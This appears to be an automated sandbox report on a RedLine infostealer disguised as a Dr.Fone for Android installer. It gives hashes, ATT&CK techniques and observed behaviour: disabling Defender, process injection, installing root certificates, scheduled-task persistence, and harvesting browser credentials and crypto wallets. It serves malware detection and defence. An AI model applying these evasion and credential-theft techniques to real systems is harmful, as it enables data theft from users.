redline | f16af1388aeddd0bcbcff560da419802dbf4841382bffb3f76571f97c0ebf95c

Analysis

max time kernel
104s
max time network
132s
platform
windows10_x64
resource
win10v20210410
submitted
17-04-2021 15:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DrfoneForAndroid.exe
Size

117.0MB
MD5

d36de3e484b54d8d9864897dc93c42d5
SHA1

8669bfcce5a0aedc82232821cf37672645bdae3a
SHA256

b3be601b4902a1ba5c0754b2f67eaed42fc7bf7560de288c8a6e0401dc112595
SHA512

681bb7785d9847379baeb93e57f74ba188d13de312047e9c4689b96bb89f56814a02852c58f0fce45239f84b61bc10ff62ab18da7c9c9b10034482ccb5bd7a20

Score

10^/10

redline discovery evasion infostealer spyware stealer trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Executes dropped EXE 22 IoCs

Processes:

DrfoneForAndroid.tmpdrfone-for-android_full1544.exedrfone-for-android_full1544.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeiexplore.exeProcessKiller.exenvnodejslauncher.exenbdrivesllapi.exeNetFxLite.exeNetFxLite.tmpNFWCHk.exeMUIServices.exelibmfxsw32.exelibmfxsw32.exe

pid	process
1776	DrfoneForAndroid.tmp
1452	drfone-for-android_full1544.exe
1908	drfone-for-android_full1544.tmp
1008	7z.exe
3780	7z.exe
1816	7z.exe
2564	7z.exe
2512	7z.exe
3892	7z.exe
3896	7z.exe
3672	7z.exe
4040	7z.exe
3808	iexplore.exe
1956	ProcessKiller.exe
1144	nvnodejslauncher.exe
2216	nbdrivesllapi.exe
2256	NetFxLite.exe
3724	NetFxLite.tmp
4092	NFWCHk.exe
3660	MUIServices.exe
1596	libmfxsw32.exe
2712	libmfxsw32.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe	upx
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe	upx

Loads dropped DLL 45 IoCs

Processes:

DrfoneForAndroid.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedrfone-for-android_full1544.tmpmscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exe

pid	process
1776	DrfoneForAndroid.tmp
1008	7z.exe
3780	7z.exe
1816	7z.exe
2564	7z.exe
2512	7z.exe
3892	7z.exe
3896	7z.exe
3672	7z.exe
4040	7z.exe
1908	drfone-for-android_full1544.tmp
2720	mscorsvw.exe
2720	mscorsvw.exe
1008	mscorsvw.exe
1008	mscorsvw.exe
1296	mscorsvw.exe
1296	mscorsvw.exe
1552	mscorsvw.exe
1552	mscorsvw.exe
3708	mscorsvw.exe
3708	mscorsvw.exe
3476	mscorsvw.exe
3476	mscorsvw.exe
3776	mscorsvw.exe
3776	mscorsvw.exe
1780	mscorsvw.exe
1780	mscorsvw.exe
932	mscorsvw.exe
932	mscorsvw.exe
4092	mscorsvw.exe
4092	mscorsvw.exe
2196	mscorsvw.exe
2196	mscorsvw.exe
3708	mscorsvw.exe
3708	mscorsvw.exe
4052	mscorsvw.exe
4052	mscorsvw.exe
3112	mscorsvw.exe
3112	mscorsvw.exe
1828	mscorsvw.exe
1828	mscorsvw.exe
3772	mscorsvw.exe
3772	mscorsvw.exe
2316	mscorsvw.exe
2316	mscorsvw.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

932 icacls.exe
3808 icacls.exe
3476 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
932	icacls.exe
3808	icacls.exe
3476	icacls.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

iexplore.exeMUIServices.exe

description	pid	process	target process
PID 3808 set thread context of 2220	3808	iexplore.exe	regasm.exe
PID 3660 set thread context of 2080	3660	MUIServices.exe	explorer.exe

Drops file in Program Files directory 64 IoCs

Processes:

drfone-for-android_full1544.tmpDrfoneForAndroid.tmp

description	ioc	process
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\GIF\is-2OHLB.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Motorola\is-LHJNI.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Samsung\S8Series\is-E5D7M.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NJ55H.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-TQU4Q.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8F7TC.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JIT55.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JL272.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-383DP.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-PJDF4.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UMTHE.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-4LE3B.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\is-3JVJD.tmp	DrfoneForAndroid.tmp
File opened for modification	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\AdbWinUsbApi.dll	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-7E0L8.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-5KVID.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-252CN.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8B81T.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-K1KA9.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Template\SMS\image\is-5E5U5.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-KMEQQ.tmp	drfone-for-android_full1544.tmp
File opened for modification	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WSAppHelper.exe	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-8VECQ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-NDEKJ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-9SV61.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-JCCD5.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-G6Q7R.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CBA9U.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DO909.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-BKN8S.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Htc\is-HP31H.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\USBDebugGuide\Xiaomi\Xiaomi\is-8PQFB.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QVKBQ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-FM9CQ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-1ENEO.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-VC9E3.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-HJ1BK.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-82PQS.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RLA80.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-L0A2H.tmp	drfone-for-android_full1544.tmp
File opened for modification	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\BaseConnection.dll	drfone-for-android_full1544.tmp
File opened for modification	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\VirtualFS.dll	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-SE1FG.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-022E7.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-M4BNG.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-DQQKE.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-BNOQI.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-V4KCP.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\WAF\Skin\Default\is-HG0MO.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\is-HNT09.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-03CCC.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-GBE8O.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-UGM7G.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QUA6D.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-CGAGG.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-ASTNS.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-Q6SNK.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-RKMSO.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-QSAE3.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\media_pre\is-RNI97.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-2BNHF.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-KSNAQ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\is-B6HDQ.tmp	drfone-for-android_full1544.tmp
File created	C:\Program Files (x86)\Wondershare\dr.fone\Addins\SocialApps\Skin\Default\Animations\is-25738.tmp	drfone-for-android_full1544.tmp

Drops file in Windows directory 64 IoCs

Processes:

ngen.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exeNetFxLite.tmpmscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exemscorsvw.exengen.exengen.exemscorsvw.exengen.exengen.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exedrfone-for-android_full1544.tmp

description	ioc	process
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	ngen.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log	ngen.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	ngen.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	ngen.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC6DB.tmp\System.Messaging.dll	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log	ngen.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe	NetFxLite.tmp
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\indexc.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	ngen.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\indexf.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	ngen.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	ngen.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPB111.tmp\System.Runtime.Serialization.Formatters.Soap.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\index1a.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log	ngen.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	ngen.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\installutil.exe.config	NetFxLite.tmp
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index1b.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	ngen.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index15.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index18.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\regtlibv12.exe	NetFxLite.tmp
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	ngen.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log	ngen.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	ngen.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock	ngen.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index17.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	ngen.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\indexd.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock	ngen.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPC44B.tmp\System.EnterpriseServices.Wrapper.dll	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	ngen.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index13.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat	mscorsvw.exe
File created	C:\Windows\assembly\ngenlock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	ngen.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.lock	ngen.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe.config	NetFxLite.tmp
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP955B.tmp\System.Xml.dll	mscorsvw.exe
File created	C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9FEA.tmp\System.Data.SqlXml.dll	mscorsvw.exe
File created	C:\Windows\assembly\GACLock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe.config	NetFxLite.tmp
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	ngen.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index11.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index14.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index16.dat	mscorsvw.exe
File opened for modification	C:\Windows\assembly\NativeImages_v2.0.50727_32\index19.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenserviceclientlock.dat	ngen.exe
File created	C:\Windows\Fonts\is-HBN7D.tmp	drfone-for-android_full1544.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2232 schtasks.exe
1328 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2084 timeout.exe
Modifies registry class 1 IoCs

Processes:

DrfoneForAndroid.tmp

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings DrfoneForAndroid.tmp

pid	process
2232	schtasks.exe
1328	schtasks.exe

pid	process
2084	timeout.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	DrfoneForAndroid.tmp

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

NFWCHk.exenvnodejslauncher.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2	NFWCHk.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob = 5c0000000100000004000000000400007e0000000100000008000000000010c51e92d201620000000100000020000000e7685634efacf69ace939a6b255b7b4fabef42935b50a265acb5cb6027e44e7009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030119000000010000001000000091161b894b117ecdc257628db460cc04030000000100000014000000742c3192e607e424eb4549542be1bbc53e6174e21d000000010000001000000027b3517667331ce2c1e74002b5ff2298140000000100000014000000e27f7bd877d5df9e0a3f9eb4cb0e2ea9efdb69770b000000010000004600000056006500720069005300690067006e00200043006c006100730073002000330020005000750062006c006900630020005000720069006d00610072007900200043004100000004000000010000001000000010fc635df6263e0df325be5f79cd67670f0000000100000010000000d7c63be0837dbabf881d4fbf5f986ad853000000010000002400000030223020060a2b0601040182375e010130123010060a2b0601040182373c0101030200c07a000000010000000e000000300c060a2b0601040182375e010268000000010000000800000000003db65bd9d5012000000001000000400200003082023c308201a5021070bae41d10d92934b638ca7b03ccbabf300d06092a864886f70d0101020500305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479301e170d3936303132393030303030305a170d3238303830313233353935395a305f310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e31373035060355040b132e436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f7269747930819f300d06092a864886f70d010101050003818d0030818902818100c95c599ef21b8a0114b410df0440dbe357af6a45408f840c0bd133d9d911cfee02581f25f72aa84405aaec031f787f9e93b99a00aa237dd6ac85a26345c77227ccf44cc67571d239ef4f42f075df0a90c68e206f980ff8ac235f702936a4c986e7b19a20cb53a585e73dbe7d9afe244533dc7615ed0fa271644c652e816845a70203010001300d06092a864886f70d010102050003818100bb4c122bcf2c26004f1413dda6fbfc0a11848cf3281c67922f7cb6c5fadff0e895bc1d8f6c2ca851cc73d8a4c053f04ed626c076015781925e21f1d1b1ffe7d02158cd6917e3441c9c194439895cdc9c000f568d0299eda290454ce4bb10a43df032030ef1cef8e8c9518ce6629fe69fc07db7729cc9363a6b9f4ea8ff640d64	NFWCHk.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	nvnodejslauncher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	nvnodejslauncher.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

DrfoneForAndroid.tmppowershell.exepowershell.exedrfone-for-android_full1544.tmpProcessKiller.exeregasm.exenbdrivesllapi.exeMUIServices.exe

pid	process
1776	DrfoneForAndroid.tmp
1776	DrfoneForAndroid.tmp
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
3672	powershell.exe
3672	powershell.exe
3672	powershell.exe
1908	drfone-for-android_full1544.tmp
1908	drfone-for-android_full1544.tmp
1908	drfone-for-android_full1544.tmp
1908	drfone-for-android_full1544.tmp
1956	ProcessKiller.exe
2220	regasm.exe
2216	nbdrivesllapi.exe
3660	MUIServices.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

iexplore.exe

pid process

3808 iexplore.exe

pid	process
3808	iexplore.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

powershell.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepowershell.exeProcessKiller.exeregasm.exenbdrivesllapi.exeMUIServices.exe

description	pid	process
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeRestorePrivilege	1008	7z.exe
Token: 35	1008	7z.exe
Token: SeSecurityPrivilege	1008	7z.exe
Token: SeSecurityPrivilege	1008	7z.exe
Token: SeRestorePrivilege	3780	7z.exe
Token: 35	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe
Token: SeSecurityPrivilege	3780	7z.exe
Token: SeRestorePrivilege	1816	7z.exe
Token: 35	1816	7z.exe
Token: SeSecurityPrivilege	1816	7z.exe
Token: SeSecurityPrivilege	1816	7z.exe
Token: SeRestorePrivilege	2564	7z.exe
Token: 35	2564	7z.exe
Token: SeSecurityPrivilege	2564	7z.exe
Token: SeSecurityPrivilege	2564	7z.exe
Token: SeRestorePrivilege	2512	7z.exe
Token: 35	2512	7z.exe
Token: SeSecurityPrivilege	2512	7z.exe
Token: SeSecurityPrivilege	2512	7z.exe
Token: SeRestorePrivilege	3892	7z.exe
Token: 35	3892	7z.exe
Token: SeSecurityPrivilege	3892	7z.exe
Token: SeSecurityPrivilege	3892	7z.exe
Token: SeRestorePrivilege	3896	7z.exe
Token: 35	3896	7z.exe
Token: SeSecurityPrivilege	3896	7z.exe
